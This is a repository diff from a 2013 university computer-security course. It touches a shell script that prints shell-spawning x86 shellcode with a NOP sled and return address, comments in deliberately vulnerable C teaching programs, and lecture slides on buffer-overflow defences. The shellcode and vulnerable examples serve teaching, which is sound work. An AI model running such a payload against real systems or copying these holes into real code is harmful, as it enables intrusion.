--- a/programs/args3	Tue Oct 08 13:01:59 2013 +0100
+++ b/programs/args3	Wed Oct 09 15:51:03 2013 +0100
@@ -1,8 +1,8 @@
 #!/bin/sh
 
-// shellscript that overwrites the buffer with 
-// some payload for opening a shell (the payload
-// cannot contain any \x00)
+# shellscript that overwrites the buffer with 
+# some payload for opening a shell (the payload
+# cannot contain any \x00)
 
 
 shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 
@@ -23,6 +23,6 @@
 
 padding=`perl -e 'print "\x90" x 80'`
 
-// need s correct address in order to run
+# need s correct address in order to run
 printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"
 

--- a/progs/C2a.c	Tue Oct 08 13:01:59 2013 +0100
+++ b/progs/C2a.c	Wed Oct 09 15:51:03 2013 +0100
@@ -1,5 +1,6 @@
-// Since gets() is insecure and produces lots of warnings, 
-// I use my own input function instead.
+// Since gets() is insecure and produces lots 
+// of warnings, thereofre I use my own input 
+// function instead.
 char ch;
 int i;
 

--- a/progs/C4.c	Tue Oct 08 13:01:59 2013 +0100
+++ b/progs/C4.c	Wed Oct 09 15:51:03 2013 +0100
@@ -1,10 +1,8 @@
 #include<stdio.h>
 #include<string.h>
 
-// a program that just prints the argument
+// a program that "just" prints the argument
 // on the command line
-//
-// try and run it with %s
 
 
 main(int argc, char **argv)

Binary file slides/info.pdf has changed

--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/slides/info.tex	Wed Oct 09 15:51:03 2013 +0100
@@ -0,0 +1,104 @@
+\documentclass[dvipsnames,14pt,t]{beamer}
+\usepackage{beamerthemeplaincu}
+%%\usepackage[T1]{fontenc}
+\usepackage[latin1]{inputenc}
+\usepackage{mathpartir}
+\usepackage[absolute,overlay]{textpos}
+\usepackage{ifthen}
+\usepackage{tikz}
+\usepackage{pgf}
+\usepackage{calc} 
+\usepackage{ulem}
+\usepackage{courier}
+\usepackage{listings}
+\renewcommand{\uline}[1]{#1}
+\usetikzlibrary{arrows}
+\usetikzlibrary{automata}
+\usetikzlibrary{shapes}
+\usetikzlibrary{shadows}
+\usetikzlibrary{positioning}
+\usetikzlibrary{calc}
+\usepackage{graphicx} 
+
+\definecolor{javared}{rgb}{0.6,0,0} % for strings
+\definecolor{javagreen}{rgb}{0.25,0.5,0.35} % comments
+\definecolor{javapurple}{rgb}{0.5,0,0.35} % keywords
+\definecolor{javadocblue}{rgb}{0.25,0.35,0.75} % javadoc
+
+\makeatletter
+\lst@CCPutMacro\lst@ProcessOther {"2D}{\lst@ttfamily{-{}}{-{}}}
+\@empty\z@\@empty
+\makeatother
+
+\lstset{language=Java,
+	basicstyle=\consolas,
+	keywordstyle=\color{javapurple}\bfseries,
+	stringstyle=\color{javagreen},
+	commentstyle=\color{javagreen},
+	morecomment=[s][\color{javadocblue}]{/**}{*/},
+	numbers=left,
+	numberstyle=\tiny\color{black},
+	stepnumber=1,
+	numbersep=10pt,
+	tabsize=2,
+	showspaces=false,
+	showstringspaces=false}
+
+\lstdefinelanguage{scala}{
+  morekeywords={abstract,case,catch,class,def,%
+    do,else,extends,false,final,finally,%
+    for,if,implicit,import,match,mixin,%
+    new,null,object,override,package,%
+    private,protected,requires,return,sealed,%
+    super,this,throw,trait,true,try,%
+    type,val,var,while,with,yield},
+  otherkeywords={=>,<-,<\%,<:,>:,\#,@,->},
+  sensitive=true,
+  morecomment=[l]{//},
+  morecomment=[n]{/*}{*/},
+  morestring=[b]",
+  morestring=[b]',
+  morestring=[b]"""
+}
+
+\lstset{language=Scala,
+	basicstyle=\consolas,
+	keywordstyle=\color{javapurple}\bfseries,
+	stringstyle=\color{javagreen},
+	commentstyle=\color{javagreen},
+	morecomment=[s][\color{javadocblue}]{/**}{*/},
+	numbers=left,
+	numberstyle=\tiny\color{black},
+	stepnumber=1,
+	numbersep=10pt,
+	tabsize=2,
+	showspaces=false,
+	showstringspaces=false}
+
+
+% beamer stuff 
+\renewcommand{\slidecaption}{APP 03, King's College London, 8 October 2013}
+
+
+\begin{document}
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\mode<presentation>{
+\begin{frame}[c]
+
+Dear All,\medskip
+
+While showing how to hack in the last lecture, I forgot to make an important announcement: the next lecture will be a guest lecture given by Richard Overill. He will present non-examinable material. I hope you still come. Richard is an expert in Cybercrime \& Cyberterrorism and often works with the Met Police Security Force. So he has first-hand knowledge about all sorts of hacking.\medskip
+
+The lecture on the 22nd will be "normal" again given by me.  
+
+\end{frame}}
+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%     
+
+\end{document}
+
+%%% Local Variables:  
+%%% mode: latex
+%%% TeX-master: t
+%%% End: 
+

Binary file slides/slides03.pdf has changed

--- a/slides/slides03.tex	Tue Oct 08 13:01:59 2013 +0100
+++ b/slides/slides03.tex	Wed Oct 09 15:51:03 2013 +0100
@@ -417,6 +417,18 @@
 \end{frame}}
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\mode<presentation>{
+\begin{frame}[c]
+
+\begin{center}
+\includegraphics[scale=0.45]{pics/trainwreck.jpg}\\
+one general defence mechanism is\\\alert{\bf defence in depth}
+\end{center}
+
+  
+\end{frame}}
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@@ -526,17 +538,17 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-\mode<presentation>{
-\begin{frame}[c]
-
-\small
-A programmer might be careful, but still introduce vulnerabilities:\bigskip
-
-{\lstset{language=Java}\fontsize{8}{10}\selectfont%
-\texttt{\lstinputlisting{../progs/C2a.c}}}
-
-  
-\end{frame}}
+%\mode<presentation>{
+%\begin{frame}[c]
+%
+%\small
+%A programmer might be careful, but still introduce vulnerabilities:\bigskip
+%
+%{\lstset{language=Java}\footnotesize
+%\texttt{\lstinputlisting{../progs/C2a.c}}}
+%
+% 
+%\end{frame}}
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@@ -582,7 +594,7 @@
 \small
 \texttt{string} is nowhere used:\bigskip
 
-{\lstset{language=Java}\fontsize{8}{10}\selectfont%
+{\lstset{language=Java}\footnotesize
 \texttt{\lstinputlisting{../progs/C4.c}}}\bigskip
 
 this vulnerability can be used to read out the stack
@@ -593,10 +605,11 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 \mode<presentation>{
 \begin{frame}[c]
-\frametitle{\begin{tabular}{c}Protections against\\ BO Attacks\end{tabular}}
+\frametitle{\begin{tabular}{c}Protections against\\ Buffer Overflow Attacks\end{tabular}}
 
 \begin{itemize}
 \item use safe library functions
+\item stack caneries
 \item ensure stack data is not executable (can be defeated)
 \item address space randomisation (makes one-size-fits-all more difficult)
 \item choice of programming language (one of the selling points of Java)